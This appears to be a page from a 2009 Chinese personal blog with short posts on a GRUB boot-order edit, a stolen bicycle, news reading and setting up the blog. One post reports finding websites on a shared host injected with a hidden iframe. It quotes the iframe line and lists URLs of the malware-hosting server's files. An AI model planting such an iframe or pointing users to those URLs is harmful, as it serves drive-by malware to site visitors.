Written by 正冰 on 2009, June 19, 3:55 AM
注:一直认为黑客!=骇客,所以文章题目写作骇客
夜间访问托管于世纪东方(www.51web.cn)主机下的几个小网站,忽然感觉不对劲,每个页面的左上角都出现了一块不显眼的疙瘩,查看源代码后发现代码如下:
<iframe src="http://vpsvip.com/a/a4.htm?89" width="100"height="0"></iframe>
逐步下载:
- http://vpsvip.com/a/a4.htm
- http://vpsvip.com/a/index.htm
- http://vpsvip.com/a/flash.htm
- http://vpsvip.com/a/iss.html
- http://vpsvip.com/a/fss.html
- http://vpsvip.com/a/swfobject.js
代码见压缩包:4htm+1js.rar
直接访问hxxp://vpsvip.com/a返回如下(火狐浏览器):
分析:
www.vpsvip.com >> 该地址无法解析为IP
vpsvip.com => 59.34.197.154 广东省 湛江市 电信
该网站下有以下可能的网站绑定着:
- 001) www.zhaopcik.com 破天一剑私服
- 002) vpsvip.com 病毒发源地
- 003) www.u866.com 完美世界私服
- 004) www.o778.com 武林外传私服
- 005) www.hao187.com 魔域私服
- 006) www.aipotian.com 破天一剑私服
- 007) www.hao228.com 无法访问
猜测:放着都是私服的网站,可见其网站本身就不是“正派”,那么可能就是服务器的管理员所做的挂马网站,或者是被人入侵获取主机权限而开通的vpsvip.com制造的一个病毒窝。
通过桌面的远程桌面连接器连接,成功连接,是一台win2003服务器
服务器租用应该是从:http://www.0760idc.com/game.asp 湛江电信线路
时间关系,没深入,跟东方的人说了下,被告知是机房arp问题,问题已经解决。
Filed under: 网络杂事
0 Comments
15587 Views
Written by 正冰 on 2009, June 17, 7:08 AM
本来对看新闻的兴趣也不是特别浓厚,只不过突然外面大事小事出了一大堆,局然不尽了解,甚是“丢脸”。故近日起重拾起看新闻资讯的乐趣来了,思来想去,还是选择Google 资讯(http://news.google.cn/)。
喜欢google简单的东西,喜欢google内在的东西,就是喜欢!
品一杯咖啡,看早间(其实是昨天的)资讯,也未尝不是一件快乐的事!
京华播报:http://v.jinghua.cn/html/dujiashipin/
Filed under: 生活记录
0 Comments
18752 Views
Written by 正冰 on 2009, June 13, 7:16 PM
Filed under: 技术归总
0 Comments
30300 Views
Written by 正冰 on 2009, June 12, 8:27 AM
2日晚自行车被窃
6日下午俩贼再次前来作案,被抓进了局子(因为当场被抓,治安拘留15天)
11日上午电话通知去XX派出所做个笔录
11 日下午屁颠屁颠坐着公交车过去(那个派出所也太小了吧!其实也不是小,就是在角落里,也没明显标志,不是有人提醒,还得费点时间才能找到)。等了20多分 钟,派出所的同志才有时间给我做笔录。据他的意思我的笔录没多大作用,暂时就先做下,因为那俩贼不承认2日也是他们干的。半小时后做完笔录,按了手指印, 撤退返回。
真背,车被偷,做个笔录倒贴4元车费
才拘留15天,便宜小偷了!
如果中国法律再健全点,那么给予这些无业游民的法律制裁就要更加严格才行!
Filed under: 生活记录
0 Comments
37903 Views
Written by 正冰 on 2009, June 5, 11:27 AM
Filed under: 系统集成
3 Comments
92781 Views
Written by 正冰 on 2009, June 4, 8:54 PM
案例:red hat linux + windows 2003 es 双系统,通过修改grub配置文件修改改变默认启动顺序
描述:默认启动linux系统,如果要想启动windows 2003系统则需要在启动电脑后的几秒钟内(GRUB倒计时)按键盘上的上下选择键切入系统选择画面,现通过修改配置文件来作用
操作过程:
进入linux系统,进入终端,通过su命令将权限提升至root(或者之前就用root登陆,但是不大符合安全操作规范),编辑/etc/grub.conf配置文件,使用vi /etc/grub.conf
# grub.conf generated by anaconda
#
# Note that you do not have to rerun grub after making changes to this file
# NOTICE: You do not have a /boot partition. This means that
# all kernel and initrd paths are relative to /, eg.
# root (hd0,6)
# kernel /boot/vmlinuz-version ro root=/dev/hda7
# initrd /boot/initrd-version.img
#boot=/dev/hda
default=0
timeout=5
splashimage=(hd0,6)/boot/grub/splash.xpm.gz
hiddenmenu
title Red Hat Enterprise Linux ES (2.6.9-22.EL)
root (hd0,6)
kernel /boot/vmlinuz-2.6.9-22.EL ro root=LABEL=/ rhgb quiet
initrd /boot/initrd-2.6.9-22.EL.img
title Windows 2003 ES
rootnoverify (hd0,0)
chainloader +1
将
# title Red Hat Enterprise Linux ES (2.6.9-22.EL)
# root (hd0,6)
# kernel /boot/vmlinuz-2.6.9-22.EL ro root=LABEL=/ rhgb quiet
# initrd /boot/initrd-2.6.9-22.EL.img
与
# title Windows 2003 ES
# rootnoverify (hd0,0)
# chainloader +1
对调位置后重启后grub会默认引导进入windows 2003 服务器系统。
Filed under: 技术归总
0 Comments
46539 Views
Written by 正冰 on 2009, June 3, 11:56 PM
今天中午去车库,发现自己的宝贝车 --- 捷安特经典系列atx660不见了。问过保安,我差不多已经感觉到车子已经在千里之外了 --- 被偷了!去了监控室,调看了监控录像,是昨晚19点49分被一个穿白衣男子撬锁后骑走了,从另外一个监控摄像头里可看到是两个男人一白一黑衣服团伙作案,各骑着一辆车出了南门,不知所踪。
纪念:06年5月19日购置于捷安特专卖店,09年6月2日晚被盗贼窃走,三年的ATX660骑行生活随着车子被偷也偷走了……
感慨:
- 我们的保安同志或许需要更加忠职于自己的岗位,在这些天车子被窃频发阶段加强对地下车库的巡逻力度
- 据一个车友说外面的世界还有直接抢车行为,没有亲身经历,但是却感觉到一丝无奈,这社会
- 下次记得要小心
附:(虽说660型号是ATX最低档的,但是现在捷安特公司升级版的ATX660照样在捷安特专卖店在卖,价格跟当初我购买的价格差不多,1100左右)
晚安,睡觉!
Filed under: 生活记录
0 Comments
47900 Views
Written by 正冰 on 2009, June 2, 8:43 PM
思考了一个上午,趁着吃午饭的间隙,还是决定开一个博客。
下午14:00,在新网注册下了is36.cn这个域名,直接注册了5年。
- Registration Date: 2009-06-02 14:00
- Expiration Date: 2014-06-02 14:00
下午15点开通了空间(暂时先用下这个虚拟主机吧),顺便提交了信产部备案并将域名解析到空间地址。
下午16点刚过,gmail信箱里就提示备案已经通过(夸赞下我的主机接入商以及浙江管局的特别高效率)。
下午17点,绑定域名到空间。
晚上20点,测试域名解析都已经生效,FTP上传并安装Bo-blog博客程序。
晚上20:43-21:00,写下这篇流水账。
晚上22:30,把整个博客系统的功能给熟悉了下,接下来就是做个自己满意的模板,然后坚持走下去!
晚上23:00,晚安,今天!
忽然还想把FCKeditor给装上去,之前写的时候感觉那个默认UBB代码实在是不方便!装了个最新版的2.6.4。
23:45 关闭电信的CDMA产品:天翼189无线宽带,关灯休息。
Filed under: 生活记录
0 Comments
45725 Views